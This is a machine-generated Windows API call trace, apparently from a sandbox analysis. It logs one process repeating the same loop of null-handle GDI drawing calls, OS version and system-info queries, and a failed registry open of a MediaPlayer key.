GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.883] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.883] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.883] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.883] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x200401cd [0087.883] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1e0401d0 [0087.884] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d4a [0087.884] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d4b [0087.884] CombineRgn (hrgnDst=0x1040d4a, hrgnSrc1=0x200401cd, hrgnSrc2=0x1e0401d0, iMode=1) returned 1 [0087.884] CombineRgn (hrgnDst=0x1040d4b, hrgnSrc1=0x200401cd, hrgnSrc2=0x1e0401d0, iMode=4) returned 2 [0087.884] CreateSolidBrush (color=0xff) returned 0x2100d49 [0087.884] CreateSolidBrush (color=0xff0000) returned 0x1100d4c [0087.884] DeleteObject (ho=0x1100d4c) returned 1 [0087.884] DeleteObject (ho=0x1e0401d0) returned 1 [0087.884] DeleteObject (ho=0x200401cd) returned 1 [0087.884] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.884] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.884] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.884] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.884] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.884] BeginPath (hdc=0x0) returned 0 [0087.884] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.884] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.884] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.884] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.884] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.884] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.884] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.884] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.884] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1f0401d0 [0087.884] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x210401cd [0087.884] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d4d [0087.884] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d4e [0087.884] CombineRgn (hrgnDst=0x1040d4d, hrgnSrc1=0x1f0401d0, hrgnSrc2=0x210401cd, iMode=1) returned 1 [0087.884] CombineRgn (hrgnDst=0x1040d4e, hrgnSrc1=0x1f0401d0, hrgnSrc2=0x210401cd, iMode=4) returned 2 [0087.884] CreateSolidBrush (color=0xff) returned 0x2100d4c [0087.884] CreateSolidBrush (color=0xff0000) returned 0x1100d4f [0087.884] DeleteObject (ho=0x1100d4f) returned 1 [0087.884] DeleteObject (ho=0x210401cd) returned 1 [0087.884] DeleteObject (ho=0x1f0401d0) returned 1 [0087.884] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.884] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.884] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.885] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.885] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.885] BeginPath (hdc=0x0) returned 0 [0087.885] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.885] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.885] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.885] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.885] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.885] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.885] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.885] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.885] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x220401cd [0087.885] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x200401d0 [0087.885] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d50 [0087.885] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d51 [0087.885] CombineRgn (hrgnDst=0x1040d50, hrgnSrc1=0x220401cd, hrgnSrc2=0x200401d0, iMode=1) returned 1 [0087.885] CombineRgn (hrgnDst=0x1040d51, hrgnSrc1=0x220401cd, hrgnSrc2=0x200401d0, iMode=4) returned 2 [0087.885] CreateSolidBrush (color=0xff) returned 0x2100d4f [0087.885] CreateSolidBrush (color=0xff0000) returned 0x1100d52 [0087.885] DeleteObject (ho=0x1100d52) returned 1 [0087.885] DeleteObject (ho=0x200401d0) returned 1 [0087.885] DeleteObject (ho=0x220401cd) returned 1 [0087.885] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.885] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.885] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.885] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.885] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.885] BeginPath (hdc=0x0) returned 0 [0087.885] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.885] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.885] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.885] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.885] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.885] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.885] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.885] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.886] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x210401d0 [0087.886] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x230401cd [0087.886] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d53 [0087.886] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d54 [0087.886] CombineRgn (hrgnDst=0x1040d53, hrgnSrc1=0x210401d0, hrgnSrc2=0x230401cd, iMode=1) returned 1 [0087.886] CombineRgn (hrgnDst=0x1040d54, hrgnSrc1=0x210401d0, hrgnSrc2=0x230401cd, iMode=4) returned 2 [0087.886] CreateSolidBrush (color=0xff) returned 0x2100d52 [0087.886] CreateSolidBrush (color=0xff0000) returned 0x1100d55 [0087.886] DeleteObject (ho=0x1100d55) returned 1 [0087.886] DeleteObject (ho=0x230401cd) returned 1 [0087.886] DeleteObject (ho=0x210401d0) returned 1 [0087.886] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.886] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.886] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.886] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.886] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.886] BeginPath (hdc=0x0) returned 0 [0087.886] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.886] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.886] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.886] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.886] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.886] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.886] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.886] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.886] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x240401cd [0087.886] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x220401d0 [0087.886] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d56 [0087.886] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d57 [0087.886] CombineRgn (hrgnDst=0x1040d56, hrgnSrc1=0x240401cd, hrgnSrc2=0x220401d0, iMode=1) returned 1 [0087.886] CombineRgn (hrgnDst=0x1040d57, hrgnSrc1=0x240401cd, hrgnSrc2=0x220401d0, iMode=4) returned 2 [0087.886] CreateSolidBrush (color=0xff) returned 0x2100d55 [0087.886] CreateSolidBrush (color=0xff0000) returned 0x1100d58 [0087.887] DeleteObject (ho=0x1100d58) returned 1 [0087.887] DeleteObject (ho=0x220401d0) returned 1 [0087.887] DeleteObject (ho=0x240401cd) returned 1 [0087.887] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.887] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.887] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.887] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.887] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.887] BeginPath (hdc=0x0) returned 0 [0087.887] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.887] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.887] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.887] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.887] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.887] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.887] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.887] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.887] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x230401d0 [0087.887] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x250401cd [0087.887] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d59 [0087.887] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d5a [0087.887] CombineRgn (hrgnDst=0x1040d59, hrgnSrc1=0x230401d0, hrgnSrc2=0x250401cd, iMode=1) returned 1 [0087.887] CombineRgn (hrgnDst=0x1040d5a, hrgnSrc1=0x230401d0, hrgnSrc2=0x250401cd, iMode=4) returned 2 [0087.887] CreateSolidBrush (color=0xff) returned 0x2100d58 [0087.887] CreateSolidBrush (color=0xff0000) returned 0x1100d5b [0087.887] DeleteObject (ho=0x1100d5b) returned 1 [0087.887] DeleteObject (ho=0x250401cd) returned 1 [0087.887] DeleteObject (ho=0x230401d0) returned 1 [0087.887] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.887] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.887] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.887] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.887] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.887] BeginPath (hdc=0x0) returned 0 [0087.887] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.887] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.887] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.887] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.888] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.888] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.888] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.888] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.888] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x260401cd [0087.888] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x240401d0 [0087.888] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d5c [0087.888] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d5d [0087.888] CombineRgn (hrgnDst=0x1040d5c, hrgnSrc1=0x260401cd, hrgnSrc2=0x240401d0, iMode=1) returned 1 [0087.888] CombineRgn (hrgnDst=0x1040d5d, hrgnSrc1=0x260401cd, hrgnSrc2=0x240401d0, iMode=4) returned 2 [0087.888] CreateSolidBrush (color=0xff) returned 0x2100d5b [0087.888] CreateSolidBrush (color=0xff0000) returned 0x1100d5e [0087.888] DeleteObject (ho=0x1100d5e) returned 1 [0087.888] DeleteObject (ho=0x240401d0) returned 1 [0087.888] DeleteObject (ho=0x260401cd) returned 1 [0087.888] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.888] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.888] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.888] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.888] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.888] BeginPath (hdc=0x0) returned 0 [0087.888] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.888] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.888] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.888] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.888] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.888] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.888] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.888] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.889] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x250401d0 [0087.889] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x270401cd [0087.889] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d5f [0087.889] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d60 [0087.889] CombineRgn (hrgnDst=0x1040d5f, hrgnSrc1=0x250401d0, hrgnSrc2=0x270401cd, iMode=1) returned 1 [0087.889] CombineRgn (hrgnDst=0x1040d60, hrgnSrc1=0x250401d0, hrgnSrc2=0x270401cd, iMode=4) returned 2 [0087.889] CreateSolidBrush (color=0xff) returned 0x2100d5e [0087.889] CreateSolidBrush (color=0xff0000) returned 0x1100d61 [0087.889] DeleteObject (ho=0x1100d61) returned 1 [0087.889] DeleteObject (ho=0x270401cd) returned 1 [0087.889] DeleteObject (ho=0x250401d0) returned 1 [0087.889] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.889] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.889] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.889] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.889] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.889] BeginPath (hdc=0x0) returned 0 [0087.889] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.889] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.889] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.889] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.889] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.889] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.889] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.889] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.889] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x280401cd [0087.889] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x260401d0 [0087.889] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d62 [0087.889] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d63 [0087.889] CombineRgn (hrgnDst=0x1040d62, hrgnSrc1=0x280401cd, hrgnSrc2=0x260401d0, iMode=1) returned 1 [0087.889] CombineRgn (hrgnDst=0x1040d63, hrgnSrc1=0x280401cd, hrgnSrc2=0x260401d0, iMode=4) returned 2 [0087.889] CreateSolidBrush (color=0xff) returned 0x2100d61 [0087.889] CreateSolidBrush (color=0xff0000) returned 0x1100d64 [0087.889] DeleteObject (ho=0x1100d64) returned 1 [0087.889] DeleteObject (ho=0x260401d0) returned 1 [0087.889] DeleteObject (ho=0x280401cd) returned 1 [0087.889] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.889] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.890] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.890] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.890] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.890] BeginPath (hdc=0x0) returned 0 [0087.890] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.890] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.890] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.890] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.890] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.890] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.890] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.890] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.890] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x270401d0 [0087.890] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x290401cd [0087.890] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d65 [0087.890] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d66 [0087.890] CombineRgn (hrgnDst=0x1040d65, hrgnSrc1=0x270401d0, hrgnSrc2=0x290401cd, iMode=1) returned 1 [0087.890] CombineRgn (hrgnDst=0x1040d66, hrgnSrc1=0x270401d0, hrgnSrc2=0x290401cd, iMode=4) returned 2 